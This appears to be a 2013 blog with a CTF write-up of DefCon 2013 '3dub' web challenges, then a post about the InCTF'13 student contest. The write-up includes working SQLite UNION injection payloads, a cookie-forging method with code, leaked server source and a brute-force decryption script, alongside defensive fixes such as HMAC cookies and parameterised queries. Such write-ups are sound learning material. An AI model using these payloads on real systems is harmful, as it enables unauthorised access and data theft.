Monday, 17 June 2013

Defcon 2013 3dub - 1, 2 and 4. Web WriteUp

DefCon 2013 3dub - Web based challenges.

This is the first time I'm writing a writeup for any CTF [practice], so please bear with it :D

3dub - 1

Whatever name you enter in the username field is accepted, and you are logged in with that name.
After logging in you get a message telling you to LOGIN as admin.

But if you give "admin" in the username field, you get a message saying admin login is disabled.

However, for every login with a different username the cookie changed.

Observation -->
username - cookie

a      - 09
b      - 0a
ab     - 09ce
ba     - 0acd
abc    - 09cd29
aaaaaa - 09cd2994af

It's just a hex-based addition on the base string "aaaaa". You don't even need to do the hex addition yourself:
get the cookie for
admi  - 09c8259c
aaaan - 09cd2994a0

=> admin - 09c8259ca0

Save the cookie and refresh; you get the key.
The key is: who wants oatmeal raisin anyways twumpAdby

Easiest challenge in DefCon 2013.
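As an added Python example (mine, not code from the challenge or the author), here is the cookie trick above done generally: one known username/cookie pair gives the per-position keystream, and any other name up to that length can then be forged. The pairs in the write-up match XOR against a fixed keystream rather than modular addition (at byte 4, 'a' and 'n' give af and a0, which differ by exactly 'a' XOR 'n'), so the code uses XOR. The second half shows the defensive counterpart, an HMAC-signed cookie, where forging requires the server secret; the secret and the username "guest" are constructed values.

```python
import hashlib
import hmac


def recover_keystream(known_name: str, known_cookie_hex: str) -> bytes:
    """XOR a known username with its cookie to get the per-position keystream.
    Works because cookie[i] = name[i] XOR k[i], with the same k for every user."""
    cookie = bytes.fromhex(known_cookie_hex)
    return bytes(c ^ p for c, p in zip(cookie, known_name.encode()))


def forge_cookie(name: str, keystream: bytes) -> str:
    """Build the cookie the server would issue for `name` without logging in as it."""
    raw = name.encode()
    if len(raw) > len(keystream):
        # Edge case: the keystream only covers as many bytes as the known name had.
        raise ValueError("keystream too short: log in with a longer known name first")
    return bytes(p ^ k for p, k in zip(raw, keystream)).hex()


# Defensive counterpart: bind the name to a MAC under a server-side secret.
def make_signed_cookie(name: str, secret: bytes) -> str:
    tag = hmac.new(secret, name.encode(), hashlib.sha256).hexdigest()
    return f"{name}.{tag}"


def verify_signed_cookie(cookie: str, secret: bytes):
    """Return the username if the tag verifies, else None (constant-time compare)."""
    name, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(secret, name.encode(), hashlib.sha256).hexdigest()
    return name if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    ks = recover_keystream("aaaaaa", "09cd2994af")  # pair taken from the write-up
    print("keystream:", ks.hex())
    print("admin cookie:", forge_cookie("admin", ks))  # the cookie the write-up derives
    secret = b"constructed-server-secret"            # constructed, not from the challenge
    good = make_signed_cookie("guest", secret)
    tampered = "admin." + good.split(".")[1]         # swap the name, keep the tag
    print(verify_signed_cookie(good, secret), verify_signed_cookie(tampered, secret))
```

The forged cookie is accepted only because the site derived it from the name with a fixed keystream; with the HMAC form the tag no longer verifies once the name is changed, and there is no keystream to recover.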

3dub - 2

Login page.

Obviously I tried SQL injection first. It WORKED!
I could log in as root, but that was no use because there was no key.

Tried analysing the GET and POST requests in ZAP. The response carried an X-SQL header:
X-SQL : SELECT name FROM users WHERE name ='   ' and pasword='   ' limit 1;

Wasted time crafting requests for MySQL.
I could log in as root and as any number from 0 to +Inf :D

Afterwards I found it was SQLite. Then I did:

  • asd'OR'1'='1' UNION SELECT name FROM sqlite_master WHERE type = "table"--
    I logged in as "keys".
  • asd'OR'1'='1' UNION SELECT name FROM keys --
and got the key:
logged in as The key is: literally online lolling on line WucGesJi
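To show concretely why the two payloads above worked, here is an added Python example (mine, not code from the challenge or the author) with a constructed in-memory SQLite database; the `users`/`keys` tables and their columns are assumptions modelled on the X-SQL query. The vulnerable string-built query sits beside the parameterised version, and `type='table'` is written with single quotes so it is a string literal in every SQLite build.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge backend (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('root', 'constructed-root-pw'), ('guest', 'guest');
        CREATE TABLE keys (name TEXT);
        INSERT INTO keys VALUES ('The key is: CONSTRUCTED-SAMPLE-FLAG');
    """)
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Query built by string concatenation, in the shape the X-SQL header revealed.
    Returns every row the query yields: once '--' comments out the trailing
    clause, the LIMIT is gone and a UNION can append rows from any table."""
    sql = ("SELECT name FROM users WHERE name ='%s' AND password='%s' LIMIT 1"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised form: the driver binds the values, so quotes, OR and '--'
    inside the input are data, never SQL. Returns the name or None."""
    row = conn.execute(
        "SELECT name FROM users WHERE name=? AND password=? LIMIT 1",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The two payloads from the write-up (single quotes around 'table', see above).
ENUM_TABLES = "asd'OR'1'='1' UNION SELECT name FROM sqlite_master WHERE type='table'--"
DUMP_KEYS = "asd'OR'1'='1' UNION SELECT name FROM keys --"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, enumerate tables:", vulnerable_login(conn, ENUM_TABLES, "x"))
    print("vulnerable, dump keys:       ", vulnerable_login(conn, DUMP_KEYS, "x"))
    print("parameterised, same payload: ", safe_login(conn, ENUM_TABLES, "x"))
    print("parameterised, real creds:   ", safe_login(conn, "root", "constructed-root-pw"))
```

Against the vulnerable function the first payload returns the table names (`keys` among them) mixed into the login result, and the second returns the contents of `keys`; the parameterised function returns nothing for either payload and only logs in with the real credentials.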

3dub - 4

It was an easy one, but I wasted more than 6 hours on it and still managed NOT to get the key. Like a BOSS XD

The page asks for a file name and an access code.
It opened usernames.txt with accesscode 60635c6862d44e8ac17dc5e144c66539,
but there was no access to passwords.txt with the same accesscode.

Found that accesscode = md5(filename).

Opening passwords.txt, I was shocked to see everything was SHA-512/salted hashes.
I thought I would move on to the next one rather than cracking these passwords.
But it would be lame to hash to that extent; that was a distraction. :p

Time to brute force the filename. Found
key.txt with accesscode 65c2a527098e1f7747eec58e1925b453

Content of key.txt-
By looking at it, the content of key.txt was base64. Decoded it with an online base64 decoder and got invalid ASCII, not the key!

The content of key.txt was changing with time. Suspected functions: time() and rand().
Major time waste here.

Afterwards I requested getfile.php itself, the script that was serving the files.
getfile.php with accesscode 0701593e23e676eaba834916a6ac7272.

Contents of getfile.php-

Acces granted to getfile.php!

<?php
$value = time();                      // current Unix timestamp
$filename = $_GET["filename"];
$accesscode = $_GET["accesscode"];
if (md5($filename) == $accesscode) {  // accesscode = md5(filename), no secret involved
    echo "Acces granted to $filename!";
    if (in_array($filename, array('getfile.php', 'index.html', 'key.txt', 'login.php', 'passwords.txt', 'usernames.txt')) == TRUE) {
        $data = file_get_contents($filename);
        if ($data !== FALSE) {
            if ($filename == "key.txt") {
                // key.txt is served AES-128-CBC encrypted with a numeric key, base64 encoded
                $key = rand();
                $cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
                echo base64_encode($cyphertext);
            } else {
                echo nl2br($data);
            }
        } else {
            echo "File does not exist";
        }
    } else {
        echo "File does not exist";
    }
} else {
    echo "Invalid access code";
}

***k it! I'm going to sleep. But I didn't, because I had already wasted a lot of time on this..
This needed a brute force; no way to do it manually.

Brute force script in PHP -
<?php
// Ciphertext served as key.txt (base64)
$text = "5HHOwWMXYH5UxvzIzxqMY3vuwyCJ5BVdzwm5puqduZrsPTxfsFNKXXMlwhZj5W/1oSv3ENrCpbIMF9cJQ5Gndg==";

// Try every possible rand() value as the key and dump each decryption
for ($key = 0; $key <= getrandmax(); $key++) {
    $data = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($text), MCRYPT_MODE_CBC);
    echo $data;
    echo "<br>";
}

Dump of brute force.

Searched for a string starting with "the key is".
No match found. No idea WHY?

Waiting for other Writeups from pros to find my mistake.

Any suggestions, please comment.

Update on 18-06-2013-->

With the help of the comment by Célestin Perdu I got to know where I had missed the point.

You can use ZAP, Burp Suite, anything. Get the date and time from the response, and convert it to a Unix timestamp:

$ date -d "the date you got from the tool" +%s

Use this value as the key, and you should get the flag.
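Pulling the pieces of this challenge together, the following added Python example (mine, not the challenge's PHP) mirrors the getfile.php gate (accesscode = md5(filename) plus the whitelist), converts a response Date header to a Unix timestamp the way the `date -d ... +%s` step does, and enumerates the keys the server could have used if the key was time(): a window of a few seconds around the header, rather than every value up to getrandmax(). The sample Date header is constructed, and the NUL-padding of the 10-byte timestamp string to the 16-byte AES-128 key size is an assumption about how the challenge's mcrypt build treated short keys; the AES-CBC decrypt itself needs a crypto library and is not included.

```python
import hashlib
import hmac
from email.utils import parsedate_to_datetime

# The whitelist from getfile.php as shown in the write-up.
WHITELIST = ('getfile.php', 'index.html', 'key.txt', 'login.php',
             'passwords.txt', 'usernames.txt')

# Access codes quoted in the write-up, for comparison against accesscode().
WRITEUP_CODES = {
    "usernames.txt": "60635c6862d44e8ac17dc5e144c66539",
    "key.txt": "65c2a527098e1f7747eec58e1925b453",
    "getfile.php": "0701593e23e676eaba834916a6ac7272",
}


def accesscode(filename: str) -> str:
    """The challenge's scheme: accesscode = md5(filename). No secret is mixed in,
    so anyone who can guess a file name can compute its code."""
    return hashlib.md5(filename.encode()).hexdigest()


def check_access(filename: str, code: str) -> bool:
    """Mirror of the getfile.php gate (md5 match and whitelist), written as a
    defender would: whitelist checked first, constant-time comparison."""
    return filename in WHITELIST and hmac.compare_digest(accesscode(filename), code)


def http_date_to_epoch(date_header: str) -> int:
    """What `date -d "<Date header>" +%s` does: RFC 1123 HTTP date to Unix time."""
    return int(parsedate_to_datetime(date_header).timestamp())


def mcrypt_style_key(ts: int, key_size: int = 16) -> bytes:
    """time() handed to mcrypt becomes its decimal string; a 10-byte key is
    assumed to have been NUL-padded to the 16-byte AES-128 key size."""
    return str(ts).encode().ljust(key_size, b"\0")


def candidate_keys(observed_ts: int, slack_seconds: int) -> list:
    """Every key the server could have used if time() was within +/- slack of
    the response Date header: the real search space is a handful of values."""
    return [mcrypt_style_key(t)
            for t in range(observed_ts - slack_seconds, observed_ts + slack_seconds + 1)]


if __name__ == "__main__":
    for name, quoted in WRITEUP_CODES.items():
        print(name, accesscode(name), "matches write-up" if accesscode(name) == quoted else "differs")
    ts = http_date_to_epoch("Mon, 17 Jun 2013 10:00:00 GMT")  # constructed header
    keys = candidate_keys(ts, 5)
    print(ts, len(keys), "candidate keys, versus 2**31 values for rand()")
```

The point of `candidate_keys` is the contrast with the PHP loop above: a key derived from the clock is pinned down by the response's own Date header, so the search is over seconds of drift, not over the whole `rand()` range.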

Thanks for reading. Suggestion and comments welcomed!

Wednesday, 12 June 2013

InCTF'13 [Amrita Cyber Security]

A national-level Capture the Flag contest, targeting only undergraduate, graduate and post-graduate students.

This CTF is meant for learning and for getting more good teams from India into the world finals of CTF contests.
FYI: CTF means capture the flag.

I would recommend anyone interested in computers to give this CTF a try. They teach you through the process. But yeah! HARD WORK is expected from you, and you should have some programming knowledge. It doesn't matter which branch/stream of specialisation you are in; don't think it's meant only for geeks from the computer science branch. I'm from an Electronics and Communication background and still took a respectable position in InCTF'13 --> second place. Even if you are from a mechanical background but still fascinated by this computer stuff, go ahead and start off with InCTF.

As I said earlier, InCTF aims more at learning.
This is how InCTF works->

1st round -

  • Purely meant for learning.
  • Designed smartly by the admins/organisers of InCTF to divide the work between the team members. Everyone can't be good at everything, so you have to stick to the topics you choose to take in this round, and become good at them.
  • Topics- Basics of Linux, SQL [ Web Based ], secure programming, Reverse Engineering, Cryptography.
This round is not mandatory, but I STRONGLY RECOMMEND taking it seriously and using it to learn, because the organisers are ready to help at any time during the 1st round.

The tool needed to finish this round successfully is GOOGLE.

2nd round - Jeopardy type.

Qualification round for National level finals i.e main CTF game.

This time they gave us 1 week, UNLIKE other CTFs which have 1-2 days.
This round is damn interesting because noobs like US need to learn and then use that knowledge to complete the tasks. So we utilised this round for learning as well.

I saw that many teams were giving up because they had NO CLUE how to even look at the tasks. Even when we opened a task, we were BLANK. But in my opinion what you need is just PATIENCE and DETERMINATION. That's all; with those you can solve 80% of the tasks in all categories. At any time you can walk into their IRC and ask whether you are on the right path for solving a particular task or not.

3rd round - Capture the flag

Time to implement! Time to test what you have learnt!

On the 1st day you will have a mock round, which gives an idea of what to do the next day. Basically it is aimed at not wasting time on the contest day. Every minute matters in the finals.

Basically you will have to exploit different types of services to get the flags.

Your team will be scored/valued on your

  1. Defence - your patching work.
  2. Offence - exploiting other team services and submitting their precious flags :p
  3. Ethical - reporting advisories.
That's all about InCTF.

We participated under the team name r00t.
Team members-
  • y0g1337h - Yogeesh Seralthan,
  • vn4v1n - Movnavinothan V &
  • x7r0n - Adithya Naresh.
1st round: we divided the work and learnt.
2nd round: LANing up is very important. We LANed up in our college hostel [ Amrita School of Engineering ] :p
3rd round: we had awesome fun exploiting services, patching them, and reporting the vulnerabilities.

Thanks for organising such an awesome event -
Arvind S Raj, Seshagiri Prabhu, Bithin Alangot.
They represent team bi0s, one of the 1337 teams in INDIA.

Pic of the trophy we earned in InCTF'13

So what are you waiting for? Form a team and start working. Earn the trophy + good cash prize + respect + knowledge + recognition.

Useful link-

Google groups

Feel free to comment.